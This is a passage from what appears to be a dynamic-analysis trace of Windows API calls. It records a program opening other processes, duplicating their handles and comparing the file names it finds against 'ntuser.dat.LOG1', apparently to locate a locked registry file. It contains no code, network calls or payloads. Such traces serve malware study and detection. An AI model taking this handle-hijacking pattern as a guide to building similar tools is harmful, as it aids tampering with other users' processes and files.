dwMilliseconds=0xfa) returned 0x0 [0161.299] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.299] CloseHandle (hObject=0x1e4) returned 1 [0161.299] CloseHandle (hObject=0x194) returned 1 [0161.299] CloseHandle (hObject=0x1e8) returned 1 [0161.299] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.299] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.303] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.304] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.304] CloseHandle (hObject=0x1e4) returned 1 [0161.305] _wcsicmp (_Str1="\\etc", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.305] CloseHandle (hObject=0x194) returned 1 [0161.305] CloseHandle (hObject=0x1e8) returned 1 [0161.305] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.305] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.306] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.306] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.306] CloseHandle (hObject=0x1e4) returned 1 [0161.306] CloseHandle (hObject=0x194) returned 1 [0161.306] CloseHandle (hObject=0x1e8) returned 1 [0161.307] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.307] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.307] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.308] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.308] CloseHandle (hObject=0x1e4) returned 1 [0161.308] CloseHandle (hObject=0x194) returned 1 [0161.308] CloseHandle (hObject=0x1e8) returned 1 [0161.309] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.309] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.309] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.313] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.313] CloseHandle (hObject=0x1e4) returned 1 [0161.313] CloseHandle (hObject=0x194) returned 1 [0161.313] CloseHandle (hObject=0x1e8) returned 1 [0161.313] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.313] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.314] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.315] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.315] CloseHandle (hObject=0x1e4) returned 1 [0161.315] CloseHandle (hObject=0x194) returned 1 [0161.315] CloseHandle (hObject=0x1e8) returned 1 [0161.315] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.315] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.316] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.317] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.317] CloseHandle (hObject=0x1e4) returned 1 [0161.317] CloseHandle (hObject=0x194) returned 1 [0161.317] CloseHandle (hObject=0x1e8) returned 1 [0161.317] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.317] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.318] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.318] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.319] CloseHandle (hObject=0x1e4) returned 1 [0161.319] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.319] CloseHandle (hObject=0x194) returned 1 [0161.319] CloseHandle (hObject=0x1e8) returned 1 [0161.319] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.319] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.320] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.320] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.321] CloseHandle (hObject=0x1e4) returned 1 [0161.321] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.321] CloseHandle (hObject=0x194) returned 1 [0161.321] CloseHandle (hObject=0x1e8) returned 1 [0161.321] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.321] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.322] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.322] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.322] CloseHandle (hObject=0x1e4) returned 1 [0161.322] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.323] CloseHandle (hObject=0x194) returned 1 [0161.323] CloseHandle (hObject=0x1e8) returned 1 [0161.323] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.323] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.323] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.324] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.324] CloseHandle (hObject=0x1e4) returned 1 [0161.324] _wcsicmp (_Str1="\\keysvc", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.324] CloseHandle (hObject=0x194) returned 1 [0161.325] CloseHandle (hObject=0x1e8) returned 1 [0161.325] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.325] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.326] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.330] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.330] CloseHandle (hObject=0x1e4) returned 1 [0161.330] _wcsicmp (_Str1="\\keysvc", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.330] CloseHandle (hObject=0x194) returned 1 [0161.330] CloseHandle (hObject=0x1e8) returned 1 [0161.330] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.330] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.331] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.332] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.332] CloseHandle (hObject=0x1e4) returned 1 [0161.332] _wcsicmp (_Str1="\\keysvc", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.332] CloseHandle (hObject=0x194) returned 1 [0161.332] CloseHandle (hObject=0x1e8) returned 1 [0161.332] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.332] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.333] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.334] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.334] CloseHandle (hObject=0x1e4) returned 1 [0161.334] CloseHandle (hObject=0x194) returned 1 [0161.334] CloseHandle (hObject=0x1e8) returned 1 [0161.334] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.334] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.335] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.335] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.336] CloseHandle (hObject=0x1e4) returned 1 [0161.336] CloseHandle (hObject=0x194) returned 1 [0161.336] CloseHandle (hObject=0x1e8) returned 1 [0161.336] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.336] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.337] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.337] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.338] CloseHandle (hObject=0x1e4) returned 1 [0161.338] CloseHandle (hObject=0x194) returned 1 [0161.338] CloseHandle (hObject=0x1e8) returned 1 [0161.338] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.338] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.338] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.339] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.339] CloseHandle (hObject=0x1e4) returned 1 [0161.339] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.339] CloseHandle (hObject=0x194) returned 1 [0161.339] CloseHandle (hObject=0x1e8) returned 1 [0161.339] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.339] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.340] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.340] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.341] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.341] CloseHandle (hObject=0x1e4) returned 1 [0161.341] _wcsicmp (_Str1="\\wkssvc", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.341] CloseHandle (hObject=0x194) returned 1 [0161.341] CloseHandle (hObject=0x1e8) returned 1 [0161.341] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.341] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.342] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.343] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.343] CloseHandle (hObject=0x1e4) returned 1 [0161.343] _wcsicmp (_Str1="\\edb.log", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.343] CloseHandle (hObject=0x194) returned 1 [0161.343] CloseHandle (hObject=0x1e8) returned 1 [0161.343] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.343] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.343] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.344] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.345] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.345] CloseHandle (hObject=0x1e4) returned 1 [0161.345] _wcsicmp (_Str1="\\catdb", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.345] CloseHandle (hObject=0x194) returned 1 [0161.345] CloseHandle (hObject=0x1e8) returned 1 [0161.345] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0161.345] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.346] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.347] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.347] CloseHandle (hObject=0x1e4) returned 1 [0161.347] _wcsicmp (_Str1="\\catdb", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.347] CloseHandle (hObject=0x194) returned 1 [0161.347] CloseHandle (hObject=0x1e8) returned 1 [0161.347] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x1e8 [0161.347] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.348] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.348] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.349] CloseHandle (hObject=0x1e4) returned 1 [0161.349] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.349] CloseHandle (hObject=0x194) returned 1 [0161.349] CloseHandle (hObject=0x1e8) returned 1 [0161.349] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.349] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.350] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.351] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.351] CloseHandle (hObject=0x1e4) returned 1 [0161.351] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.351] CloseHandle (hObject=0x194) returned 1 [0161.351] CloseHandle (hObject=0x1e8) returned 1 [0161.351] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.351] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.351] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.352] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.352] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.352] CloseHandle (hObject=0x1e4) returned 1 [0161.352] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.353] CloseHandle (hObject=0x194) returned 1 [0161.353] CloseHandle (hObject=0x1e8) returned 1 [0161.353] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.353] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.353] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.354] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.354] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.354] CloseHandle (hObject=0x1e4) returned 1 [0161.354] CloseHandle (hObject=0x194) returned 1 [0161.354] CloseHandle (hObject=0x1e8) returned 1 [0161.354] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.355] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.355] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.355] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.356] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.356] CloseHandle (hObject=0x1e4) returned 1 [0161.356] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.357] CloseHandle (hObject=0x194) returned 1 [0161.357] CloseHandle (hObject=0x1e8) returned 1 [0161.357] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.357] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.357] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.358] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.358] CloseHandle (hObject=0x1e4) returned 1 [0161.358] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.358] CloseHandle (hObject=0x194) returned 1 [0161.358] CloseHandle (hObject=0x1e8) returned 1 [0161.358] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.358] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.359] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.360] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.360] CloseHandle (hObject=0x1e4) returned 1 [0161.360] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.360] CloseHandle (hObject=0x194) 